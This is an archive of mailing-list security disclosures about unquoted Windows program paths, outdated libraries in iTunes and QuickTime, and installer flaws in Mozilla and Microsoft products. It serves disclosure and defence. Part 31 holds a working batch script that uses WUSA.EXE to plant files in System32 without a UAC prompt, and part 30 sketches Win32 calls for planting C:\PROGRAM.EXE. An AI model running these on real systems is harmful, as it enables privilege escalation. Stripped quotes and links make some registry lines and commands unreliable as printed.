   restrictions imposed by these programs for non-XUL/chrome Javascript.


Disable profile local installation of extensions in Mozilla products,
enable ONLY application global installation of extensions.

stay tuned
Stefan Kanthak

iTunes 12.2 and QuickTime 7.7.7 for Windows: still outdated and VULNERABLE 3rd party libraries, still UNQUOTED and VULNERABLE pathnames C:\Program Files\...

2015-07-01 Thread Stefan Kanthak
Hi @ll,

the just released QuickTime 7.7.7 and iTunes 12.2 for Windows still
have quite some of the BLOODY beginners errors I already documented
in the past.

QuickTime 7.7.7, QuickTime.msi

unquoted pathname of executables in command line

@=C:\\Program Files\\QuickTime\\QuickTimePlayer.exe

iTunes 12.2, AppleMobileDeviceSupport.msi

outdated 3rd party libraries:

* libcurl 7.16.2

  is NINE years old and has at least 25 unfixed CVEs!

  The current version is 7.43.0; for the fixed vulnerabilities

* libeay32.dll and ssleay32.dll 0.9.8za from 2014-06-05

  The current version is 0.9.8zg and has 24 security fixes
  which are missing in 0.9.8za; see

Apple STILL doesnt care about customer security, so better STAY AWAY
from their insecure software!

Stefan Kanthak

Defense in depth -- the Mozilla way: return and exit codes are dispensable

2015-03-16 Thread Stefan Kanthak
Hi @ll,

since some time Mozilla Firefox and Thunderbird for Windows come with
a maintenance service (running privileged under the SYSTEM account):

The maintenanceservice_installer.exe (which is extracted into the
resp. installation directory) is executed during the end of the
Firefox/Thunderbird installation when the user has not deselected
the [x] Install maintenance service option ... and has quite some

#1. it exits with code 0, even when it fails to install the
maintenance service.

To trigger such a failure create an (empty) file
%ProgramFiles%\Mozilla Maintenance Service.

#2. the main installers ['][²] don't check the return code of the
call used to start the maintenanceservice_installer.exe and don't
inform the user who started the installation about this failure.

Apparently Mozilla's developers never learnt the 101 of computer
programming: ALWAYS check return and exit codes!

To trigger this failure add the NTFS ACE (D;OIIO;WP;;;WD)
meaning Deny execution of files for everyone, inheritable to all
files in all subdirectories to your %USERPROFILE% and perform a
user-defined installation to the custom installation directory

JFTR: after setting this NTFS ACE (as well as activating SAFER
  alias software restriction policies or Windows' parental
  controls; see all methods
  Mozilla uses to update their products fail: Mozilla
  products download an executable ['][²] into their profiles
  but don't check whether execution is allowed there, nor do
  they check the return code of the call used to start this

#3. it ignores a user-defined custom installation directory, but
uses the hardcoded %ProgramFiles%\Mozilla Maintenance Service.

[Mozilla] That is intentional since the service runs as the
 system and could be exploited.

The BOFH creates a junction
MkLink /J %ProgramFiles%\Mozilla Maintenance Service 
and runs the installer [³].

The files created on the desktop are exploitable: they
inherited the NTFS DACL of the parent directory giving full
access to the user.

JFTR: what's the difference of a user-defined custom installation
  directory via the corresponding installer option and the
  redirection via reparse point?
  The installer ignores the first, why not ignore the latter

[Mozilla] The maintenance service is a shared component of
 Firefox and Thunderbird.

According to the 20+ years old Designed for Windows guidelines!
shared components go to %CommonProgramFiles%\vendor\component.

JFTR: are you kidding?
  (why) are Gecko, NSS, XUL, ICU etc. NO shared components?

stay tuned
Stefan Kanthak

['] Windows SetupAPI exists since 20 years now and doesnt need any
3rd party binaries/executables: just write a .INF and package
it with the files to install into a .CAB, then run the .INF via
RunDll32.Exe AdvPack.Dll,LaunchINFSectionEx *.INF,,*.CAB,...

[²] the Microsoft  (now: Windows) installer exists since 15 years
and was a Windows component before Mozilla started Phoenix^W
Firefox. It too doesnt need any 3rd party executables.

JFTR: would you dare to distribute software for a UNIX/Linux
  system which does not use the native package manager of
  the target system?

[³] quite some script kiddies have the bad habit to move
%ProgramFiles% away from %SystemDrive%, despite or
they create a junction or symlink from %ProgramFiles% to some
other location but typically forget to set an appropriate NTFS
DACL on the target to protect the files installed there from

Defense in depth -- the Microsoft way (part 30): on exploitable Win32 functions

2015-03-16 Thread Stefan Kanthak
Hi @ll,

since Microsoft won't -- despite (hopefully not only) my constant
nagging and quite some bug reports about unquoted command lines
for more than a dozen years now -- fix the BRAINDEAD behaviour
of Windows' CreateProcess*() functions to play tryerror instead
of returning on error to their caller when interpreting their
lpCommandLine argument which lets the BLOODY BEGINNER's error
known as CWE-428
go undetected, I'll show some methods including the preconditions
on how to exploit it, i.e. execute a file of my choice.

JFTR: none of these methods should be new or unknown to any
  Windows administrator, developer or QA engineer.-P

JFTR: in Microsoft's own terms these methods don't qualify as
  security vulnerabilities due to their precondition(s).

#1. Preconditions:

* a file in %SystemDrive%\ which can be opened with the
  access rights GENERIC_WRITE | DELETE and the attribute

* a user account holding the privilege SE_RESTORE_NAME.


handle = CreateFile(LC:\\..., GENERIC_WRITE | DELETE,
SetFileShortName(handle, LPROGRAM.EXE)

#2. Preconditions:

* an empty file in %SystemDrive%\ which can be opened with
  and the attribute FILE_FLAG_OPEN_REPARSE_POINT;

* a user account holding the privileges SE_RESTORE_NAME and


handle = CreateFile(LC:\\...,
DeviceIoControl(handle, FSCTL_SET_REPARSE_POINT, ...

Now wait until some program written by a dimwit of a developer
who (and of course his/her supervisors and QA too) never heard
of long filenames (which means they must have lived beneath
a rock for more than 20 years) executes your C:\PROGRAM.EXE

20+ years old:
~20 years old:
10+ years old:

Primary candidates: Apple iTunes, Microsoft .NET Framework 3.5
SP1 x64 (as preinstalled on Windows 7 x64 and Windows 2008 R2 AD
controllers), WHQL-certified drivers from HP, ALPS[*], Realtek[*],
Samsung, Synaptics, ... (many of those are available per Windows
Update and the Microsoft Update Catalog), MANY games, ...

As Microsoft's Aaron Margosis wrote last November pointing out
this BLOODY BEGINNER's error is unnessarily alarmist:

Of course all non-alarmists know for sure that the above named
preconditions don't exist anywhere.-(

What but REALLY alarmist is: companies like Apple release version
after version of their products/drivers^Wcrapware without the
TRIVIAL fix for this well-known vulnerability, even when notified
over and over again!

Defense in depth?

Software engineering?

BRAINDEAD behaviour of Windows CreateProcess*() functions?
Yes, of course, always!

Taking care for the safety and security of their customers systems?

stay tuned (and far away from crapware!)
Stefan Kanthak

[*] see

Defense in depth -- the Microsoft way (part 31): UAC is for binary planting

2015-03-16 Thread Stefan Kanthak
Hi @ll,

the exploit shown here should be well-known to every
Windows administrator, developer or QA engineer.

In Microsoft's own terms it doesn't qualify as security
vulnerability since UAC is a security feature, not a
security boundary.


* a user running as protected Administrator on Windows 7
  and newer with standard UAC settings.

  JFTR: this is the default for out-of-the-box installations
and typically almost never changed!

* some executables in directory %SystemRoot%\, but not in
  directory %SystemRoot%\System32\ (or %SystemRoot%\SysWoW64\);

  JFTR: REGEDIT.EXE is one of these executables, and it has a
manifest which specifies
requestedExecutionLevel level=highestAvailable,
so users running as protected Administrator are
accustomed to the UAC prompt when they start REGEDIT.EXE
and will most probably acknowledge the privilege elevation.

  Exploit (to be run as a batch script):

  for %%! in (%SystemRoot%\*.exe %SystemRoot%\*.dll) do call :PLANT %%~nx!
  exit /b
  if exist %SystemRoot%\System32\%~1 goto :EOF
  copy NUL: %TEMP%\%~1
  %SystemRoot%\System32\makecab.exe %TEMP%\%~1 %TEMP%\
  %SystemRoot%\System32\wusa.exe %TEMP%\ 
  if /I %~x1 == .exe %~1 /?

  WUSA.EXE is one of the about 70 Microsoft programs which are
  UAC-autoelevated since Windows 7, so the user doesn't need to
  answer the UAC prompt when the batch script plants a file in
  the directory %SystemRoot%\System32\


* set the UAC control to ask always (as it was in Windows Vista)

* remove the user accounts created during setup from the
  Administrators group and place them in the Users group, i.e.
  demote these accounts from Administrator to Standard user.

  Start-Run control.exe userpasswords2 alias
  rundll32.exe netplwiz.dll,UsersRunDll allows this operation!

  JFTR: don't forget to enable the builtin Administrator account.


| There are three types of accounts. Each type gives you a different
| level of control over the PC:
| * Administrator accounts provide the most control over a PC, and
|   should be used sparingly. You probably created this type of
|   account when you first started using your PC.
| * Standard accounts are for everyday use. If you're setting up
|   accounts for other people on your PC, it's a good idea to give
|   them standard accounts.

stay tuned
Stefan Kanthak

Defense in depth -- the Microsoft way (part 29): contradicting, ambiguous, incomplete documentation

2015-02-23 Thread Stefan Kanthak
Hi @ll,

the MSDN documents the BRAINDEAD behaviour of the functions
for an unquoted long pathname of the executable in command lines:

| [...] the module name must be the first white space-delimited token in
| the lpCommandLine string. If you are using a long file name that contains
| a space, use quoted strings to indicate where the file name ends and the
| arguments begin; otherwise, the file name is ambiguous.
| For example, consider the string c:\program files\sub dir\program name.
| This string can be interpreted in a number of ways. The system tries
| to interpret the possibilities in the following order: ~
| c:\program.exe files\sub dir\program name
| c:\program files\sub.exe dir\program name
| c:\program files\sub dir\program.exe name
| c:\program files\sub dir\program name.exe
| [...] the first white space-delimited token of the command line
| specifies the module name. If you are using a long file name that
| contains a space, use quoted strings to indicate where the file name
| ends and the arguments begin [...] If the file name does not contain
| an extension, .exe is appended. [...] if the file name contains a path,
| .exe is not appended. ~

1. self-contradictory/ambiguous:

   If the second underlined clause of the documentation were correct,
   and the usual definition of path(name) ['] is assumed (so c:\,
   c:\program files\sub and c:\program files\sub dir\program
   qualify as pathnames), the interpretation of the string
  c:\program files\sub dir\program name
   given above would be wrong.

   The interpretation given above but matches the observed behaviour
   of the CreateProcess*() functions, therefore the underlined clause
   of the documentation is WRONG and should be removed!

2. incomplete/ambiguous:

   the documentation does not specify what tries to interpret the
   possibilities exacly means: using the example given above, is
   CreateProcess*() expected to skip
   c:\program.exe, c:\program files\sub.exe and/or
   c:\program files\sub dir\program.exe if they exist but are not

   a) due to invalid file contents?

  Observed behaviour:
  CreateProcess*() tries to execute c:\program.exe etc. and returns

   b) due to insufficient permissions?

  Observed behaviour:
  CreateProcess*() tries to execute c:\program.exe etc. and returns

   c) because they are an unsupported or unknown [²] reparse point?

  Observed behaviour:
  CreateProcess*() tries to execute c:\program.exe etc. and returns

   d) because they are a directory (including directories overlaid with
  a reparse point), a mount point, a junction to a directory or a
  symlink to a directory?

  Observed behaviour:
  in contradiction to MSKB 812486 [³] CreateProcess*() does not
  try to execute a directory c:\program.exe etc. and skips it.

  Skipping over directories or reparse points targetting
  directories is but surprising behaviour, since
  CreateProcess*(directory, NULL, ...) and
  CreateProcess*(NULL, directory, ...) return
  (as expected) ERROR_ACCESS_DENIED!

3. incomplete/surprising:

   The observed behaviour for
   CreateProcess(NULL, C:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe, ...)
   is: CreateProcess*() tries to execute C:\Program.exe and
   C:\Program Files (x86)\Internet.exe, but NOT
   C:\Program Files.exe

   Why is C:\Program Files.exe NOT a possibility to try?

4. incomplete:

   when CreateProcess*() is called (for example) with the command
   line c:\program files\sub dir\program name and plays tryerror,
   the executed application does NOT receive the original command line,
   but a MODIFIED command line:

   - c:\program files\sub.exe dir\program name
   - c:\program files\sub dir\program.exe name
   - c:\program files\sub dir\program.exe name.exe

   i.e. the pathname of the found executable gets quoted if it contains
   a space.

   The documentation of the function GetCommandLine()
   but misses this completely!

Stay tuned!

Stefan Kanthak

['] as soon as a name contains a single '\' or ':' it is a pathname!


| When the file system opens a file

iTunes 12.1.1 for Windows: still outdated and VULNERABLE 3rd party libraries, still UNQUOTED and VULNERABLE pathnames C:\Program Files\...

2015-02-19 Thread Stefan Kanthak
Hi @ll,

the just released iTunes 12.1.1 for Windows still comes with
outdated and VULNERABLE 3rd party libraries and vulnerable
command lines:

In AppleMobileDeviceSupport.msi:

* libeay32.dll and ssleay32.dll 0.9.8za from 2014-06-05

  The current version is 0.9.8ze and has 21 security fixes
  which are missing in 0.9.8za; see

  At last, these DLLs are no more 7 years old as before, but
  only 8 months old.

* libcurl.dll 7.16.2

  is EIGHT years old and has at least 22 unfixed CVEs!

  The current version is 7.40.0; for the fixed vulnerabilities

An attacker can load these vulnerable DLLs and call their buggy
routines to exploit these bugs!

In AppleApplicationSupport.msi:

* msvcr100.dll and msvcp100.dll 10.0.40219.1 from 2011-02-20

  These are the runtime DLLs for Visual C++ 2010 RTM.

  The current version is but 10.0.40219.325; see

An attacker can load these vulnerable DLLs and and call their
buggy routines to exploit their bugs!

Additionally the following VULNERABLE[*] command lines with unquoted
pathnames containing spaces are registered.

By AppleApplicationSupport.msi:




For beginners: the value of the unnamed registry entry is a COMMAND
LINE and has to be quoted properly!


| To help provide system security, use quoted strings in the path to
| indicate where the executable filename ends and the arguments begin. 

As of Windows 2003 developers who are NOT completely unaware of
Microsofts documentation might want to use the ServerExecutable
registry entry described there too.
But 12 years are surely way too short for Apple's developers, QA and
management to learn about such new features which help improve safety
and security.

By iTunes.msi:

@=[#iTunes.exe] /url \%1\

@=[#iTunes.exe] /url \%1\

@=[#iTunes.exe] /url \%1\

@=[#iTunes.exe] /url \%1\

@=[#iTunes.exe] /url \%1\

@=[#iTunes.exe] /url \%1\


@=[#iTunes.exe] /url \%1\

@=[#iTunes.exe] /url \%1\

@=[INSTALLDIR]iTunes.exe /url \%1\

@=[INSTALLDIR]iTunes.exe /url \%1\

@=[INSTALLDIR]iTunes.exe /url \%1\

@=[INSTALLDIR]iTunes.exe /url \%1\

@=[INSTALLDIR]iTunes.exe /url \%1\

@=[INSTALLDIR]iTunes.exe /url \%1\

@=[INSTALLDIR]iTunes.exe /url \%1\


| If any element of the command string contains or might contain
| spaces, it must be enclosed in quotation marks. Otherwise, if
| the element contains a space, it will not parse correctly.

JFTR: the command lines referenced above are about 1/3 of all
  the command lines registered by iTunes.msi; the other 2/3
  have properly quoted pathnames.

See if you want to
detect software with this 20+ year old vulnerability[*] without
dissecting its *.MSI files.

Until Apple's developers, their QA and their managers start to
develop a sense for their customers safety and security and
due diligence: stay away from Apple's (Windows) software!

stay tuned
Stefan Kanthak

You'll read more about it soon!

Defense in depth -- the Microsoft way (part 28): yes, we can (create even empty, but properly quoted pathnames)

2015-02-19 Thread Stefan Kanthak
Hi @ll,

in order to prevent the start of the defunct USENET news client
(alias Windows Mail) that Microsoft installs with Windows 7
and later versions of Windows as Microsoft Outlook NewsReader,
the installation of all editions of Microsoft Office 2010 which
include Microsoft Outlook 2010 as well as the standalone version
of the latter create the following registry entries for the
Microsoft Outlook NewsReader with empty pathnames for the
icons and in the command lines:



[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\News\Microsoft Outlook]
@=Microsoft Outlook

[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\News\Microsoft Outlook\Protocols]

[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\News\Microsoft Outlook\Protocols\news]
URL Protocol=

@=, -3



@=\\ /outnews /newsurl:%1

[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\News\Microsoft Outlook\Protocols\nntp]
URL Protocol=

@=, -3



@=\\ /outnews /newsurl:%1

[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\News\Microsoft Outlook\Protocols\snews]
URL Protocol=

@=, -3



@=\\ /outnews /newsurl:%1

[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\News\Microsoft Outlook\shell]

[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\News\Microsoft Outlook\shell\open]

[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\News\Microsoft Outlook\shell\open\command]
@=\\ /outnews
--- EOF ---

JFTR: the superfluous empty unnamed (default) registry values are
  created due to a well-known bug in the tools (not only) Microsoft
  uses to build packages for the Microsoft Installer.

  See but
  why creating an empty default registry value (not only) for the
  open verb is a bug:

  | When registering standard verbs, do not set the default value
  | for the Open key. The default value contains the display string
  | on the menu. The operating system supplies this string for
  | standard verbs.

Stefan Kanthak

PS: Windows 7, and of course Windows 8, Windows 8.1 and Windows 10 too,
have at least one command line with an empty but properly quoted
pathname out-of-the-box, even before the installation of Microsoft
Outlook 2010:

[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\Windows Mail\InstallInfo]

[ANN] MSKB 3004375 available for Windows 2000 and later too (but NOT from Mcirosoft)

2015-02-11 Thread Stefan Kanthak
Hi @ll,

yesterday Microsoft published the security advisory 3004375
announcing an update which enables Windows 7 and newer to log
the command lines used to start processes to the event log.

If you want to have this functionality on older versions of
Windows too see
(but notice the license terms).

Limitation: command lines of processes that dont load USER32.DLL
are not logged. Fortunately almost all Win32 applications but
load USER32.DLL

JFTR: APPINIT.DLL works since 20 years.

Stefan Kanthak

Defense in depth -- the Microsoft way (part 27): the command line you get differs from the command line I use to call you

2015-02-02 Thread Stefan Kanthak
Hi @ll,

on Windows, the command line an application receives can differ
from the command line the calling application supplies to

The documentation of GetCommandLine() tells:

| Note  The name of the executable in the command line that
| the operating system provides to a process is not necessarily
| identical to that in the command line that the calling process
| gives to the CreateProcess function. The operating system may
| prepend a fully qualified path to an executable name that is
| provided without a fully qualified path.

This is not the whole truth, another Note is missing there:
when CreateProcess*() is called using a command line with an
UNQUOTED long filename/pathname containing spaces (a well-known
it uses tryerror to guess the pathname of the executable.

The documentation of CreateProcess() tells:

| [...] the module name must be the first white space-delimited
| token in the lpCommandLine string. If you are using a long file
| name that contains a space, use quoted strings to indicate where
| the file name ends and the arguments begin; otherwise, the file
| name is ambiguous. For example, consider the string
| c:\program files\sub dir\program name.
| This string can be interpreted in a number of ways. The system
| tries to interpret the possibilities in the following order:
|c:\program.exe files\sub dir\program name
|c:\program files\sub.exe dir\program name
|c:\program files\sub dir\program.exe name
|c:\program files\sub dir\program name.exe

In the latter 3 cases the command line is but modified too:
Windows adds quotes around the part of the command line which
forms the result of this interpretation and yields the path
to the executable if this part contains a space.

The 4 command lines shown above are transformed into:

c:\program.exe files\sub dir\program name
c:\program files\sub.exe dir\program name
c:\program files\sub dir\program.exe name
c:\program files\sub dir\program name.exe

JFTR: without this transformation splitting of the command line
  into the argv vector would give wrong results ... in
  presense of CreateProcess*() braindead behaviour!

Stay tuned!

Stefan Kanthak

PS: the documentation of CommandLineToArgvW()
contains a funny and surprising remark:

| This function accepts command lines that contain a program name;
| the program name can be enclosed in quotation marks or not.

This does but NOT mean that CommandLineToArgvW() tries to
guess like CreateProcess()!
It treats c:\program files\sub dir\program name
as c:\program files\sub dir\program name.

Defense in depth -- the Microsoft way (part 26): Set Program Access and Computer Defaults hides applications like Outlook

2014-12-30 Thread Stefan Kanthak
Hi @ll,

in order to prevent the possible execution of a rogue program like
C:\Program.exe or C:\Program Files\Microsoft.exe, on x64 also
C:\Program Files.exe or C:\Program Files (x86)\Microsoft.exe,
due to the beginner's error of using unquoted pathnames containing
spaces (see,
Windows' [*] Set Program Access and Computer Defaults (SPAD, see hides programs
that are registered with such erroneous and vulnerable command lines.

For example Microsoft Outlook 2007, Microsoft Outlook 2010 as well as
Microsoft Outlook 2013.

If you have one of these versions of Microsoft Outlook installed but
can't configure it with SPAD, export its registry entries with the
erroneous and vulnerable command lines into a file OUTLOOK.REG:


The file OUTLOOK.REG will look like this (the wildcard ? varies with
your version of Outlook):


[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\Microsoft Outlook\InstallInfo]
HideIconsCommand=C:\\Program Files\\Microsoft Office\\OFFICE1?\\OUTLOOK.EXE 
ShowIconsCommand=C:\\Program Files\\Microsoft Office\\OFFICE1?\\OUTLOOK.EXE 
ReinstallCommand=C:\\Program Files\\Microsoft Office\\OFFICE1?\\OUTLOOK.EXE 

--- EOF ---

Open the file with your favorite editor and insert the string \
before and after (the 3 occurences of) the pathname
C:\\Program Files\\Microsoft Office\\OFFICE1#\\OUTLOOK.EXE

The corrected file should look like this:


[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\Microsoft Outlook\InstallInfo]
HideIconsCommand=\C:\\Program Files\\Microsoft 
Office\\OFFICE1?\\OUTLOOK.EXE\ /spadhideicons
ShowIconsCommand=\C:\\Program Files\\Microsoft 
Office\\OFFICE1?\\OUTLOOK.EXE\ /spadshowicons
ReinstallCommand=\C:\\Program Files\\Microsoft 
Office\\OFFICE1?\\OUTLOOK.EXE\ /spadreinstall

--- EOF ---

Save your changes and import the file into the registry:


Start SPAD again and find Microsoft Office Outlook now displayed as
mail program.

Stefan Kanthak

[*] at least Windows 7, but I assume this behaviour was introcuded
with Windows Vista; in earlier versions of Windows SPAD but
displays applications with erroneous and vulnerable command lines
and runs rogue programs!

PS: will MSFT ever afford a QA that can find such bloody trivial
beginner's errors?

Defense in depth -- the Microsoft way (part 23): two quotes or not to quote...

2014-12-14 Thread Stefan Kanthak
Hi @ll,

some Windows commands/programs fail when (one of) their
command line argument(s) is/are enclosed in quotes; for

%SystemRoot%\System32\FontView.Exe pathname.TTF
%SystemRoot%\System32\FONTVIEW.Exe /P filename.TTF
%SystemRoot%\System32\SetupAPI.Dll,InstallHinfSection section flags 

The failure messages shown by both commands are priceless,
they dont give the slightest hint why they fail at all.-(

JFTR: both commands support (like NOTEPAD.EXE or CreateProcess(),
  long but unquoted file/pathnames containing spaces!

Another example:

%TEMP%\just a test.eml Echo Subject: Just a test

%ProgramFiles%\Windows Mail\WinMail.Exe /EML:%TEMP%\just a test.eml
%ProgramFiles%\Windows Mail\WinMail.Exe /ForwardEML:%TEMP%\just a test.eml
%ProgramFiles%\Windows Mail\WinMail.Exe /ReplyEML:%TEMP%\just a test.eml
%ProgramFiles%\Windows Mail\WinMail.Exe /ReplyAllEML:%TEMP%\just a test.eml

%TEMP%\just a test.nws Echo Subject: Just a test

%ProgramFiles%\Windows Mail\WinMail.Exe /NWS:%TEMP%\just a test.nws
%ProgramFiles%\Windows Mail\WinMail.Exe /ForwardNWS:%TEMP%\just a test.nws
%ProgramFiles%\Windows Mail\WinMail.Exe /ReplyNWS:%TEMP%\just a test.nws
%ProgramFiles%\Windows Mail\WinMail.Exe /ReplyAllNWS:%TEMP%\just a test.nws

show the error message

The File ...\just a test.eml could not be opened because it does
 not exist or is being used by another application. (0x800CCF65, 123)

At least this message gives a very slight hint: the Win32 error '123'
The filename, directory name, or volume label syntax is incorrect;
see or run
NET.EXE HelpMsg 123

Again, same as above: this program works when the argument is not
quoted, despite the long pathname containing spaces:

%ProgramFiles%\Windows Mail\WinMail.Exe /EML:%TEMP%\just a test.eml
%ProgramFiles%\Windows Mail\WinMail.Exe /NWS:%TEMP%\just a test.nws

%ProgramFiles%\Windows Mail\WinMail.Exe 
%ProgramFiles%\Windows Mail\WinMail.Exe 
both work with a quoted argument!

JFTR: if you dont have Windows Mail, but Windows Live Mail or
  Outlook Express: they too show the same inconsistent and
  surprising behaviour.

  I have not checked whether Outlook has the same bug, but
  I'm confident it has.-(

Microsoft, can't you afford a QA?

And one more:

the AppInit_DLLs registry entry
(see as well as

JFTR: although AppInit_DLLs are only supported on Windows NT
  (see a braindead
  developer choose not to use a REG_MULTI_SZ value (avoiding
  the need to interpret spaces as separator and thus supporting
  long filenames).

have fun
Stefan Kanthak

Still beginner's errors (and outdated 3rd party components) in QuickTime 7.7.6 and iTunes 12.0.1

2014-10-27 Thread Stefan Kanthak
Hi @ll,

the just released QuickTime 7.7.6 and iTunes 12.0.1 for Windows still
have quite some of the beginners errors I documented in and

QuickTime 7.7.6:

@=C:\\Program Files\\QuickTime\\QuickTimePlayer.exe

iTunes 12.0.1:

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe /url \%1\

@=C:\\Program Files\\...\\iTunes.exe

Also, QuickTime 7.7.6 comes with version 2.3.6 of Apple's application
support, while iTunes 12.0.1 comes with version 3.1 of this package.

While the older version 2.3.6 properly quotes the command lines in

@=\C:\\Program Files\\...\\APSDaemon.exe\

@=\C:\\Program Files\\...\\APSDaemon.exe\

the newer version 3.1 does not:

@=C:\\Program Files\\...\\APSDaemon.exe

@=C:\\Program Files\\...\\APSDaemon.exe

@=C:\\Program Files\\...\\APSDaemon.exe

Additionally, application support 3.1 contains outdated and vulnerable
version 10.0.40219.1 of MSVCR100.DLL and MSVCP100.DLL

Cf. and alias

Will Apple's developers and their QA EVER learn how to use filenames
with embedded spaces properly?

Stefan Kanthak

iTunes 12.0.1 for Windows: still COMPLETELY outdated and VULNERABLE 3rd party libraries

2014-10-27 Thread Stefan Kanthak
Hi @ll,

the just released iTunes 12.0.1 for Windows still (cf. comes
with  COMPLETELY outdated and VULNERAEBLE 3rd party libraries
(as part of AppleMobileDeviceSupport.msi):

* libeay32.dll and ssleay32.dll 0.9.8d

  are more than SEVEN years old and have at least 27 unfixed CVEs!

* libcurl.dll 7.16.2

  is more than SEVEN years old and has at least 18 unfixed CVEs!
  the current version is 7.38.0;
  for the fixed vulnerabilities!

Until Apple's developers, their QA and their managers start to
develop a sense for safety and security:
stay away from their (Windows) software!

Stefan Kanthak


2014-06-06informed vendor

2014-06-06vendor sent automated response

... no more reaction

2014-07-03requested status

... no answer

Defense in depth -- the Microsoft way (part 19): still no perfect forward secrecy per default in Windows 8/7/Vista/Server 2012/Server 2008 [R2]

2014-09-08 Thread Stefan Kanthak
Hi @ll,

on April 8, 2014 Microsoft published an update for Windows 8.1 and
Windows Server 2012 R2 (see
which enables perfect forward secrecy per default by reordering of
the TLS cipher suites.

Unfortunately Microsoft has not published corresponding updates for
Windows 8/Server 2012, Windows 7/Server 2008 R2 and Windows Vista/
Server 2008, despite numerous requests from its customers, although
these version support perfect forward secrecy. For example, see

Fortunately it's dead simple to enable perfect forware secrecy in
Windows Vista and later versions: just change the order of the TLS
cipher suites in the registry entry


and reboot.

For Windows 7/Server 2008 R2/8/Server 2012 you can use the script to perform all
the necessary changes to enable PFS as well as TLS 1.2 and disable
some week algorithms/ciphers too.

You'll see the success when you visit, or with Internet Explorer 8 and
later after the reboot.

have fun
Stefan Kanthak

JFTR: IPsec is able to use perfect forward secrecy for MANY years,
  see, and as well as

Defense in depth -- the Microsoft way (part 18): Microsoft Office 2010 registers command lines with unquoted pathnames

2014-09-02 Thread Stefan Kanthak
Hi @ll,

Microsoft Office 2010 registers the following command lines with unquoted
pathnames containing spaces for various supported file types:

| C:\ FType | FIND.EXE =%ProgramFiles%\Microsoft 
| access=C:\Program Files\Microsoft Office\Office14\protocolhandler.exe %1
| Access.ACCDAExtension.14=C:\Program Files\Microsoft 
| Access.Extension.14=C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE 
| Access.Shortcut.Query.1=C:\Program Files\Microsoft 
| Access.Shortcut.Table.1=C:\Program Files\Microsoft 
| Access.UriLink.14=C:\Program Files\Microsoft 
Office\Office14\protocolhandler.exe %1
| dqyfile=C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
| excel=C:\Program Files\Microsoft Office\Office14\protocolhandler.exe %1
| Excel.Chart=C:\Program Files\Microsoft Office\Office14\EXCEL.EXE /dde
| Excel.UriLink.14=C:\Program Files\Microsoft 
Office\Office14\protocolhandler.exe %1
| iqyfile=C:\Program Files\Microsoft Office\Office14\EXCEL.EXE /dde
| ms-access=C:\Program Files\Microsoft Office\Office14\protocolhandler.exe %1
| ms-excel=C:\Program Files\Microsoft Office\Office14\protocolhandler.exe %1
| ms-powerpoint=C:\Program Files\Microsoft Office\Office14\protocolhandler.exe 
| ms-publisher=C:\Program Files\Microsoft Office\Office14\protocolhandler.exe 
| ms-word=C:\Program Files\Microsoft Office\Office14\protocolhandler.exe %1
| Outlook.File.eml.14=C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE 
/eml %1
| powerpoint=C:\Program Files\Microsoft Office\Office14\protocolhandler.exe %1
| PowerPoint.Show.4=C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE %1
| PowerPoint.Show.7=C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE %1
| PowerPoint.Slide.12=C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 
| PowerPoint.Slide.4=C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 
| PowerPoint.Slide.7=C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 
| PowerPoint.Slide.8=C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 
| PowerPoint.SlideMacroEnabled.12=C:\Program Files\Microsoft 
Office\Office14\POWERPNT.EXE %1
| PowerPoint.UriLink.14=C:\Program Files\Microsoft 
Office\Office14\protocolhandler.exe %1
| publisher=C:\Program Files\Microsoft Office\Office14\protocolhandler.exe %1
| Publisher.UriLink.14=C:\Program Files\Microsoft 
Office\Office14\protocolhandler.exe %1
| word=C:\Program Files\Microsoft Office\Office14\protocolhandler.exe %1
| Word.UriLink.14=C:\Program Files\Microsoft 
Office\Office14\protocolhandler.exe %1


| Note: If any element of the command string contains or might contain
| spaces, it must be enclosed in quotation marks. Otherwise, if the
| element contains a space, it will not parse correctly. For instance,
| My Program.exe starts the application properly. If you use
| My Program.exe without quotation marks, then the system attempts to
| launch My with Program.exe as its first command line argument.

Fortunately these command lines are NOT used when a user opens a file
associated with Office 2010 via Windows Explorer: Microsoft Office is
installed via Windows Installer and lets it create Darwin descriptors
In the presence of a Darwin descriptor ShellExecute*() does not use the
command line displayed by FType, but queries Windows Installer for it.

BUT: all program(mer)s who dont use ShellExecute*() but query the
 registry for the associated command line will execute the rogue
 programs C:\Program.exe or C:\Program Files\Microsoft.exe

Stefan Kanthak

Beginners error: Apple's Software Update runs rogue program C:\Program.exe (and some more)

2014-08-18 Thread Stefan Kanthak
Hi @ll,

C:\Program Files\Apple Software Update\SoftwareUpdate.exe, part
of Apple's Software Update and installed together with iTunes,
QuickTime and other of Apple's crap for Windows, is periodically
called with the argument -task.

